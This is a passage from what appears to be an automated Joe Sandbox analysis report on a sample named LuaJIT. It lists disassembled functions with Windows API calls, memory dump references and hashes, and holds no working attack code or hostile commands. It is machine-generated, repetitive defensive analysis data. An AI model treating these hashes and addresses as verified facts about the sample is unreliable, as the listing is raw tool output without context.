                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2E01A57F3860A91FF247793A8411B092119B18B70FC85331D93C0A3E09EACAE99CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7724669D8 Relevance: 3.2, APIs: 2, Instructions: 194COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7724663F0: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF772466714,?,?,?,?,00000000,COMSPEC,?,00007FF7724669AE), ref: 00007FF77246641A
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF7724667C7,?,?,?,?,00000000,COMSPEC,?,00007FF7724669AE), ref: 00007FF772466A43
                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF7724667C7,?,?,?,?,00000000,COMSPEC,?,00007FF7724669AE), ref: 00007FF772466A8F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CodeInfoPageValid
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 546120528-0
                                                                                                                                                                                                                              • Opcode ID: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                                                                                                                                                                                              • Instruction ID: 2050f43cef052d3d2ce9847b279d6a6cbe7d67d8f5356baf592f709fd13874ac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c69a90c0386b87ed3e1871073eaed1069123791459b7e64fa7c6bddaab46548
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1181EAA3E3C692A5F765AF279440079F671EB44B44FC4403AC66E47290DEBDED41CB28
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77244B120 Relevance: 3.2, APIs: 2, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                                                                                                                                                                                              • Instruction ID: 905a58fbc8a94bb2d34ec7cafae62d957980ccd9caedfaf39a73f9c1ce7b8c91
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 23f93f3439cf481d68ace413158a8b6a052188d27ba90543d8d527b73a2b783b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C351D723F3829145FB69BE67940067AA681BF44BA8F844630DD7C177D5CEBCEC01CA20
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772466D20 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF7724560FF,?,?,COMSPEC,00007FF7724565F2), ref: 00007FF772466D39
                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF7724560FF,?,?,COMSPEC,00007FF7724565F2), ref: 00007FF772466DFD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3328510275-0
                                                                                                                                                                                                                              • Opcode ID: f8e312304a874f8c283f2dac22943bf0ad66c413af5a88ef9b261a62e94a3eb2
                                                                                                                                                                                                                              • Instruction ID: 8c518b2b6f270c6b8d91a41279b395dc5d91103af46418f879028f22e73c2cff
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8e312304a874f8c283f2dac22943bf0ad66c413af5a88ef9b261a62e94a3eb2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D217372F3879181E620AF136440029E6A5BB54BD4B884138DEAD67BD9DF7CEC52CB14
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77242D400 Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3548387204-0
                                                                                                                                                                                                                              • Opcode ID: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                                                                                                                                                                                              • Instruction ID: b563039c8e9360d2b6434456bc81664a5a07db45b4a4fa3cf5a841f6a954b9e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62e22788655639b8fc294ace6df2bf72dda36c5940e2cb69f5321f03f315bef0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40115457E3810282FE18B7B348562B882C15F91740FD41834F9ADA62CBED9CBC45CE76
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245D5D8 Relevance: 3.1, APIs: 2, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF77245D50B,?,?,00000000,00007FF77245D5B3,?,?,?,?,?,?,00007FF77244AF6A), ref: 00007FF77245D63E
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF77245D50B,?,?,00000000,00007FF77245D5B3,?,?,?,?,?,?,00007FF77244AF6A), ref: 00007FF77245D648
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1687624791-0
                                                                                                                                                                                                                              • Opcode ID: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                                                                                                                                                                                              • Instruction ID: 158b936382e08c105079d57353f1c3b70ff1a00c390c69518a01809d89813ed1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 342de704302773eeb4f8a3e9181b51dc3d1ebcbc1097d58ab930e3d4315a225c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7118453B3868381EF547767949027D92D2AF45BA8FD40239DD7E472C2CEECAC45CA21
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77240F080 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                                                                                                                                                                                              • Instruction ID: a8d13caad5d2fd4cb908068adf940372a2dbd036070903312cf8617cc0bc7ce0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a766f8a0e7bd2c8c12d36500e370b6cf717aaa638450d80a18f47b53e407cafa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E111832928A4582D630AB16E484329B3B0F798758F904231E6AE437E8CFBDDD95CF10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772392DC0 Relevance: 2.7, APIs: 2, Instructions: 151COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                                              • Opcode ID: 130162f1e612a8c7bbf9229168b096cb58dc45a9e80bbc9874db3e364027be0a
                                                                                                                                                                                                                              • Instruction ID: 05f048b4980097f291bd39826afd2eaf12579ff20c0429c72da1d1b865635de4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 130162f1e612a8c7bbf9229168b096cb58dc45a9e80bbc9874db3e364027be0a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3771D837628B8586DB60DB1AE49036AB7A0F7C9B94F504125EADD87BA8DF7CD441CF00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77239CAF0 Relevance: 1.7, APIs: 1, Instructions: 217stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3418686817-0
                                                                                                                                                                                                                              • Opcode ID: 46deeca88af4f2afcebb9a4e617de638de49ea4923ecd2725507a84c711ec80f
                                                                                                                                                                                                                              • Instruction ID: 2f98cafb5091f65395b1f6a5a7b91b3adf7e544098fa7bfbe2e18904fdc4de4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46deeca88af4f2afcebb9a4e617de638de49ea4923ecd2725507a84c711ec80f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BB10B3362C6858AD670DB19E48036AB7A0F7CAB98F504526EAED83B59DF7CD541CF00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF7723B4C00 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2882679554-0
                                                                                                                                                                                                                              • Opcode ID: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                                                                                                                                                                                              • Instruction ID: 10c1073c17fd132a467782b3b89b782a1ff73b37c1e5193f60fbc2a21dc3a5cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE51D937628B4982DA20DF1AE49012AB7B1F7C9B94F500276EB9D47B69CF3CD451CB14
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245E7D8 Relevance: 1.6, APIs: 1, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: db93148fabc532a6c34eb6862733ff8622850cb7730be65101fd0d6c6195c713
                                                                                                                                                                                                                              • Instruction ID: 22f910aa1346fd422e25c0bd91a5cc9cb0e9738995765baee28b173bbf9f7b58
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db93148fabc532a6c34eb6862733ff8622850cb7730be65101fd0d6c6195c713
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D441B133B3868197EB54AB1B9640278B3A0EB45744F940530DAAD87691CFBCE862CB65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77239DFF0 Relevance: 1.6, APIs: 1, Instructions: 102stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3418686817-0
                                                                                                                                                                                                                              • Opcode ID: db3bc8e4ef4c65b70a045808fb7ad9c0a3b65bf8df5448bd60f029c1fc6b1b88
                                                                                                                                                                                                                              • Instruction ID: 59b68e2a407f8ebb7d5a3af2cecc3ce4c314acd0fe190da20626d38599faaf36
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db3bc8e4ef4c65b70a045808fb7ad9c0a3b65bf8df5448bd60f029c1fc6b1b88
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5551AF76618B8486D760DB49E49031AFBA0F7C9B98F104266EADD47B64CB7DC544CF40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF77245E0C0 Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff772380000_LuaJIT.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                                                                                                                                                                                              • Instruction ID: 4172ca5c0c25ec75b509d2e233c6c93c35b624cf4dcc146faca05c42e43e7a22
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11314B33B3869246E7067B57884137CA651AF84BA4FD50235E9BD073D2CEFCA841DB25
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF772461698 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.1786382341.00007FF772381000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF772380000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786370067.00007FF772380000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786446495.00007FF772471000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786464088.00007FF77248F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786481510.00007FF772490000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786498765.00007FF772492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.1786513543.00007FF772495000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
